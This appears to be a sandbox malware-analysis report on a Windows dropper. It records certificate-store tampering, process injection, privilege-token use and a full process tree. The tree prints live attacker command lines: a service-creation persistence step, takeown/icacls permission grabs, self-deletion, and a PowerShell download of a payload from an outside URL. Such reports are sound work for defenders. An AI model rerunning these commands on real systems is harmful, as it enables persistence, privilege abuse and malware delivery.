040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	vpn-1002.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	kat3C07.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	eagleget-2-1-6-50.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

3188 regedit.exe
5216 regedit.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

2364 PING.EXE
6552 PING.EXE
7948 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

svcshost.exe

pid process

7508 svcshost.exe

pid	process
3188	regedit.exe
5216	regedit.exe

pid	process
2364	PING.EXE
6552	PING.EXE
7948	PING.EXE

pid	process
7508	svcshost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup.exewin1.exeoutput.execomp.exesvcshost.exekat3C07.tmppowershell.exepowershell.exekat41D1.tmpprint.exe

pid	process
8300	Setup.exe
8300	Setup.exe
8424	win1.exe
8424	win1.exe
8868	output.exe
8424	win1.exe
8480	comp.exe
8480	comp.exe
8424	win1.exe
8424	win1.exe
8424	win1.exe
8424	win1.exe
8424	win1.exe
8424	win1.exe
7508	svcshost.exe
8424	win1.exe
7876	kat3C07.tmp
1984	powershell.exe
8424	win1.exe
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7876	kat3C07.tmp
7248	powershell.exe
8424	win1.exe
8988	kat41D1.tmp
3352	print.exe
3352	print.exe
3352	print.exe
3352	print.exe
3352	print.exe
3352	print.exe
3352	print.exe
3352	print.exe

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

Setup.execomp.exe

pid process

8300 Setup.exe
8480 comp.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

New Text Document mod.exeAntiVirus2.exesvchost.exewin1.exealabi.execsc.exetakeown.exe7z.exe7z.exe7z.exesvcshost.exetaskkill.exepowershell.exepowershell.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exetakeown.exetakeown.exetakeown.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	2956	New Text Document mod.exe
Token: SeDebugPrivilege	240	AntiVirus2.exe
Token: SeDebugPrivilege	8380	svchost.exe
Token: SeDebugPrivilege	8424	win1.exe
Token: SeDebugPrivilege	9084	alabi.exe
Token: SeDebugPrivilege	8380	svchost.exe
Token: SeDebugPrivilege	5220	csc.exe
Token: SeTakeOwnershipPrivilege	5824	takeown.exe
Token: SeRestorePrivilege	7160	7z.exe
Token: 35	7160	7z.exe
Token: SeSecurityPrivilege	7160	7z.exe
Token: SeSecurityPrivilege	7160	7z.exe
Token: SeRestorePrivilege	7288	7z.exe
Token: 35	7288	7z.exe
Token: SeSecurityPrivilege	7288	7z.exe
Token: SeSecurityPrivilege	7288	7z.exe
Token: SeRestorePrivilege	7400	7z.exe
Token: 35	7400	7z.exe
Token: SeSecurityPrivilege	7400	7z.exe
Token: SeSecurityPrivilege	7400	7z.exe
Token: SeDebugPrivilege	7508	svcshost.exe
Token: SeDebugPrivilege	2196	taskkill.exe
Token: SeDebugPrivilege	1984	powershell.exe
Token: SeDebugPrivilege	7248	powershell.exe
Token: SeRestorePrivilege	3076	7z.exe
Token: 35	3076	7z.exe
Token: SeSecurityPrivilege	3076	7z.exe
Token: SeSecurityPrivilege	3076	7z.exe
Token: SeRestorePrivilege	3200	7z.exe
Token: 35	3200	7z.exe
Token: SeSecurityPrivilege	3200	7z.exe
Token: SeSecurityPrivilege	3200	7z.exe
Token: SeRestorePrivilege	3816	7z.exe
Token: 35	3816	7z.exe
Token: SeSecurityPrivilege	3816	7z.exe
Token: SeSecurityPrivilege	3816	7z.exe
Token: SeRestorePrivilege	4124	7z.exe
Token: 35	4124	7z.exe
Token: SeSecurityPrivilege	4124	7z.exe
Token: SeSecurityPrivilege	4124	7z.exe
Token: SeRestorePrivilege	4324	7z.exe
Token: 35	4324	7z.exe
Token: SeSecurityPrivilege	4324	7z.exe
Token: SeSecurityPrivilege	4324	7z.exe
Token: SeRestorePrivilege	4660	7z.exe
Token: 35	4660	7z.exe
Token: SeSecurityPrivilege	4660	7z.exe
Token: SeSecurityPrivilege	4660	7z.exe
Token: SeRestorePrivilege	5048	7z.exe
Token: 35	5048	7z.exe
Token: SeSecurityPrivilege	5048	7z.exe
Token: SeSecurityPrivilege	5048	7z.exe
Token: SeRestorePrivilege	5284	7z.exe
Token: 35	5284	7z.exe
Token: SeSecurityPrivilege	5284	7z.exe
Token: SeSecurityPrivilege	5284	7z.exe
Token: SeRestorePrivilege	5700	7z.exe
Token: 35	5700	7z.exe
Token: SeSecurityPrivilege	5700	7z.exe
Token: SeSecurityPrivilege	5700	7z.exe
Token: SeTakeOwnershipPrivilege	6412	takeown.exe
Token: SeTakeOwnershipPrivilege	6832	takeown.exe
Token: SeTakeOwnershipPrivilege	2024	takeown.exe
Token: SeTakeOwnershipPrivilege	8140	takeown.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

crt.tmpClient.exe

pid process

4608 crt.tmp
4604 Client.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

Client.exe

pid process

4604 Client.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

win1.exeAcroRd32.exe

pid process

8424 win1.exe
8948 AcroRd32.exe
8948 AcroRd32.exe
8948 AcroRd32.exe

pid	process
4608	crt.tmp
4604	Client.exe

pid	process
4604	Client.exe

pid	process
8424	win1.exe
8948	AcroRd32.exe
8948	AcroRd32.exe
8948	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

New Text Document mod.exeSetup.exeoutput.execomp.execrt.exe

description	pid	process	target process
PID 2956 wrote to memory of 2852	2956	New Text Document mod.exe	eagleget-2-1-6-50.exe
PID 2956 wrote to memory of 2852	2956	New Text Document mod.exe	eagleget-2-1-6-50.exe
PID 2956 wrote to memory of 2852	2956	New Text Document mod.exe	eagleget-2-1-6-50.exe
PID 2956 wrote to memory of 2852	2956	New Text Document mod.exe	eagleget-2-1-6-50.exe
PID 2956 wrote to memory of 2852	2956	New Text Document mod.exe	eagleget-2-1-6-50.exe
PID 2956 wrote to memory of 240	2956	New Text Document mod.exe	AntiVirus2.exe
PID 2956 wrote to memory of 240	2956	New Text Document mod.exe	AntiVirus2.exe
PID 2956 wrote to memory of 240	2956	New Text Document mod.exe	AntiVirus2.exe
PID 2956 wrote to memory of 240	2956	New Text Document mod.exe	AntiVirus2.exe
PID 2956 wrote to memory of 8300	2956	New Text Document mod.exe	Setup.exe
PID 2956 wrote to memory of 8300	2956	New Text Document mod.exe	Setup.exe
PID 2956 wrote to memory of 8300	2956	New Text Document mod.exe	Setup.exe
PID 2956 wrote to memory of 8300	2956	New Text Document mod.exe	Setup.exe
PID 2956 wrote to memory of 8300	2956	New Text Document mod.exe	Setup.exe
PID 2956 wrote to memory of 8300	2956	New Text Document mod.exe	Setup.exe
PID 2956 wrote to memory of 8300	2956	New Text Document mod.exe	Setup.exe
PID 2956 wrote to memory of 8380	2956	New Text Document mod.exe	svchost.exe
PID 2956 wrote to memory of 8380	2956	New Text Document mod.exe	svchost.exe
PID 2956 wrote to memory of 8380	2956	New Text Document mod.exe	svchost.exe
PID 2956 wrote to memory of 8424	2956	New Text Document mod.exe	win1.exe
PID 2956 wrote to memory of 8424	2956	New Text Document mod.exe	win1.exe
PID 2956 wrote to memory of 8424	2956	New Text Document mod.exe	win1.exe
PID 8300 wrote to memory of 8480	8300	Setup.exe	comp.exe
PID 8300 wrote to memory of 8480	8300	Setup.exe	comp.exe
PID 8300 wrote to memory of 8480	8300	Setup.exe	comp.exe
PID 8300 wrote to memory of 8480	8300	Setup.exe	comp.exe
PID 8300 wrote to memory of 8480	8300	Setup.exe	comp.exe
PID 8300 wrote to memory of 8480	8300	Setup.exe	comp.exe
PID 8300 wrote to memory of 8480	8300	Setup.exe	comp.exe
PID 2956 wrote to memory of 8868	2956	New Text Document mod.exe	output.exe
PID 2956 wrote to memory of 8868	2956	New Text Document mod.exe	output.exe
PID 2956 wrote to memory of 8868	2956	New Text Document mod.exe	output.exe
PID 2956 wrote to memory of 8868	2956	New Text Document mod.exe	output.exe
PID 8868 wrote to memory of 8948	8868	output.exe	AcroRd32.exe
PID 8868 wrote to memory of 8948	8868	output.exe	AcroRd32.exe
PID 8868 wrote to memory of 8948	8868	output.exe	AcroRd32.exe
PID 8868 wrote to memory of 8948	8868	output.exe	AcroRd32.exe
PID 8868 wrote to memory of 8968	8868	output.exe	SIG.EXE
PID 8868 wrote to memory of 8968	8868	output.exe	SIG.EXE
PID 8868 wrote to memory of 8968	8868	output.exe	SIG.EXE
PID 8868 wrote to memory of 8968	8868	output.exe	SIG.EXE
PID 8300 wrote to memory of 8480	8300	Setup.exe	comp.exe
PID 2956 wrote to memory of 9084	2956	New Text Document mod.exe	alabi.exe
PID 2956 wrote to memory of 9084	2956	New Text Document mod.exe	alabi.exe
PID 2956 wrote to memory of 9084	2956	New Text Document mod.exe	alabi.exe
PID 2956 wrote to memory of 9084	2956	New Text Document mod.exe	alabi.exe
PID 8480 wrote to memory of 3552	8480	comp.exe	FUT.au3
PID 8480 wrote to memory of 3552	8480	comp.exe	FUT.au3
PID 8480 wrote to memory of 3552	8480	comp.exe	FUT.au3
PID 8480 wrote to memory of 3552	8480	comp.exe	FUT.au3
PID 8480 wrote to memory of 3552	8480	comp.exe	FUT.au3
PID 8480 wrote to memory of 3552	8480	comp.exe	FUT.au3
PID 8480 wrote to memory of 3552	8480	comp.exe	FUT.au3
PID 2956 wrote to memory of 4472	2956	New Text Document mod.exe	crt.exe
PID 2956 wrote to memory of 4472	2956	New Text Document mod.exe	crt.exe
PID 2956 wrote to memory of 4472	2956	New Text Document mod.exe	crt.exe
PID 2956 wrote to memory of 4472	2956	New Text Document mod.exe	crt.exe
PID 2956 wrote to memory of 4472	2956	New Text Document mod.exe	crt.exe
PID 2956 wrote to memory of 4472	2956	New Text Document mod.exe	crt.exe
PID 2956 wrote to memory of 4472	2956	New Text Document mod.exe	crt.exe
PID 4472 wrote to memory of 4608	4472	crt.exe	crt.tmp
PID 4472 wrote to memory of 4608	4472	crt.exe	crt.tmp
PID 4472 wrote to memory of 4608	4472	crt.exe	crt.tmp
PID 4472 wrote to memory of 4608	4472	crt.exe	crt.tmp

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

7484 attrib.exe
2764 attrib.exe

pid	process
7484	attrib.exe
2764	attrib.exe

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
1⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2956
- C:\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe
  "C:\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe"
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  PID:2852
- C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:240
- C:\Users\Admin\AppData\Local\Temp\a\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:8300
- - C:\Windows\SysWOW64\comp.exe
    C:\Windows\SysWOW64\comp.exe
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:8480
  - - C:\Users\Admin\AppData\Local\Temp\FUT.au3
      C:\Users\Admin\AppData\Local\Temp\FUT.au3
      4⤵
      Loads dropped DLL
      PID:3552
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 252
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:3648
- C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:8380
- C:\Users\Admin\AppData\Local\Temp\a\win1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\win1.exe"
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:8424
- C:\Users\Admin\AppData\Local\Temp\a\output.exe
  "C:\Users\Admin\AppData\Local\Temp\a\output.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:8868
- - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\DOCUMENT (3).PDF"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:8948
- - C:\Users\Admin\AppData\Local\Temp\SIG.EXE
    "C:\Users\Admin\AppData\Local\Temp\SIG.EXE"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    PID:8968
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5220
- C:\Users\Admin\AppData\Local\Temp\a\alabi.exe
  "C:\Users\Admin\AppData\Local\Temp\a\alabi.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:9084
- C:\Users\Admin\AppData\Local\Temp\a\crt.exe
  "C:\Users\Admin\AppData\Local\Temp\a\crt.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4472
- - C:\Users\Admin\AppData\Local\Temp\is-VONQV.tmp\crt.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-VONQV.tmp\crt.tmp" /SL5="$40160,5149750,54272,C:\Users\Admin\AppData\Local\Temp\a\crt.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    PID:4608
  - - C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe
      "C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe" -i
      4⤵
      Executes dropped EXE
      PID:7848
  - - C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe
      "C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe" -s
      4⤵
      Executes dropped EXE
      PID:3316
- C:\Users\Admin\AppData\Local\Temp\a\oiii.exe
  "C:\Users\Admin\AppData\Local\Temp\a\oiii.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:8160
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" cmd /c takeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe" && icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F
    3⤵
    PID:5732
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:5824
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5876
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" cmd /c sc create "Accecss Auto Connetcion Manager" binPath= "C:\Program Files\Windows Media Player\wmixedwk.exe" START= auto DISPLAYNAME= "WebServer" TYPE= own
    3⤵
    PID:6228
  - - C:\Windows\system32\sc.exe
      sc create "Accecss Auto Connetcion Manager" binPath= "C:\Program Files\Windows Media Player\wmixedwk.exe" START= auto DISPLAYNAME= "WebServer" TYPE= own
      4⤵
      Launches sc.exe
      PID:6508
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\kkxqbh.bat" "
    3⤵
    PID:6320
  - - C:\Windows\system32\PING.EXE
      ping 127.0.0.1 -n 3
      4⤵
      Runs ping.exe
      PID:6552
- C:\Users\Admin\AppData\Local\Temp\a\conhost.exe
  "C:\Users\Admin\AppData\Local\Temp\a\conhost.exe"
  2⤵
  - Executes dropped EXE
  PID:1484
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
    3⤵
    - Loads dropped DLL
    PID:7036
  - - C:\Windows\system32\mode.com
      mode 65,10
      4⤵
      PID:7096
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e file.zip -p563741341569714296105326100 -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:7160
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_2.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:7288
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_1.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:7400
  - - C:\Windows\system32\attrib.exe
      attrib +H "svcshost.exe"
      4⤵
      Views/modifies file attributes
      PID:7484
  - - C:\Users\Admin\AppData\Local\Temp\main\svcshost.exe
      "svcshost.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:7508
- C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe
  "C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  PID:7728
- - C:\Users\Admin\AppData\Local\Temp\kat3C07.tmp
    C:\Users\Admin\AppData\Local\Temp\kat3C07.tmp
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    PID:7876
- C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe
  "C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  PID:8824
- - C:\Users\Admin\AppData\Local\Temp\kat41D1.tmp
    C:\Users\Admin\AppData\Local\Temp\kat41D1.tmp
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    PID:8988
- C:\Users\Admin\AppData\Local\Temp\a\inte.exe
  "C:\Users\Admin\AppData\Local\Temp\a\inte.exe"
  2⤵
  - Executes dropped EXE
  PID:2604
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a\inte.exe" & exit
    3⤵
    PID:8764
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "inte.exe" /f
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2196
- C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe
  "C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies system certificate store
  PID:4056
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nst4397.tmp\abc.bat"
    3⤵
    PID:5416
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"
